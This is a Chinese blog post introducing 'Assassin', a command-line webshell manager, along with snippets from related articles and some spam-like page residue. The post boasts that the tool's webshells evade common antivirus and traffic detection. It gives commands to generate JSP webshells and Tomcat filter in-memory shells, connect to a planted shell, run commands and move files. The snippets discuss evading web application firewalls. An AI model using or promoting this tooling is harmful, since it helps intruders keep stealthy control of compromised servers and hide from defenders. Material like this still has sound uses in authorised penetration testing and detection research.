<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    一款精簡的webshell管理工具 -- Assassin

    一顆小胡椒2023-01-03 11:41:11

    一、工具介紹

    Assassin是一款精簡的基于命令行的webshell管理工具,它有著多種payload發送方式和編碼方式,以及精簡的payload代碼,使得它成為隱蔽的暗殺者,難以被很好的防御。工具短小精悍,生成的webshell能夠過常見殺軟,盡量減少了連接后交互的流量特征,具體payload發送方式均可自定義。由于個人精力有限(因為懶而且菜),服務端暫時僅支持Java。

    二、安裝與使用

    1、用startup.bat或startup.sh啟動,之后會彈出窗口選擇保存位置

    new java 123 cookie
    # 生成密碼為123 發送方式為cookie的普通jsp木馬
    new java pass post reqEncode=base36 tamper=tomcat9_filter
    # 生成密碼為pass 發送方式為post 請求用base36編碼的tomcat9 filter內存馬
    

    2、將webshell上到目標服務器

    add http://192.168.48.130:8080/1.jsp 123 java method=cookie resEncode=base36
    # 添加webshell 密碼123 java馬 cookie傳參 請求編碼默認base64 響應編碼base36
    

    3、show查看ID號 

    4、session 1連接webshell

    5、看到提示符發生變化就可以執行webshell controller commands的命令了

    Assassin|java >getshell
    Assassin|java|C:\apache-tomcat-9.0.54\bin >dir
    

    6、上傳文件

    upload # 沒參數默認傳到當前目錄,選擇文件即可上傳

    7、下載文件

    download ./test.txt同理

    下載地址:

    項目地址:https://github.com/b1ackc4t/Assassin

    cookiewebshell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    接到一個緊急測試任務,只有一個目標名稱和一個ip。這樣的話webshell的url就無法正常訪問了)帶上cookie即可正常連接。連接成功后,為了穩定webshell,我們嘗試將webshell寫入到根目錄和靜態文件的目錄,但是仍會受到強制跳轉的影響。于是將webshell內容寫入到了在登陸前就能訪問的jsp正常文件中,來穩定shell。
    webshell免殺之傳參方式及特征繞過傳參方式 在這里解釋一下為什么,需要講述傳參方式,由于在很多情況下,以請求頭作為參數傳遞并非waf和人工排查的重中之重且非常誤導和隱藏
    工具短小精悍,生成的webshell能夠過常見殺軟,盡量減少了連接后交互的流量特征,具體payload發送方式均可自定義。由于個人精力有限,服務端暫時僅支持Java。
    Webshell簡介webshell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種代碼執行環境,主要用于網站管理、服務器管理、權限管理等操作。它的流量特征十分明顯,現如今的安全設備基本上都可以識別到菜刀的流量。現在的菜刀基本都是在安全教學中使用。
    WebShell基礎詳解
    2022-01-07 06:47:08
    顧名思義,“web”的含義是顯然需要服務器開放web服務,“shell”的含義是取得對服務器某種程度上操作權限。webshell常常被稱為入侵者通過網站端口對網站服務器的某種程度上操作的權限。由于webshell其大多是以動態腳本的形式出現,也有人稱之為網站的后門工具。
    顧名思義,“web”的含義是顯然需要服務器開放web服務,“shell”的含義是取得對服務器某種程度上操作權限。webshell常常被稱為入侵者通過網站端口對網站服務器的某種程度上操作的權限。由于webshell其大多是以動態腳本的形式出現,也有人稱之為網站的后門工具。
    目前國內安全人員常用的有:中國菜刀、中國蟻劍、冰蝎、哥斯拉、Metasploit、SharPyShell等,也有一些內部團隊開發的類似工具,但是并沒有對外公開。已被各大安全廠商提取其特征。任何人不得將其用于非法用途以及盈利等目的,否則后果自行承擔!這個工具超越于普通的webshell管理是因為其還擁有安全掃描、漏洞利用測試等功能,可以幫助滲透測試人員進行高效的測試工作。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类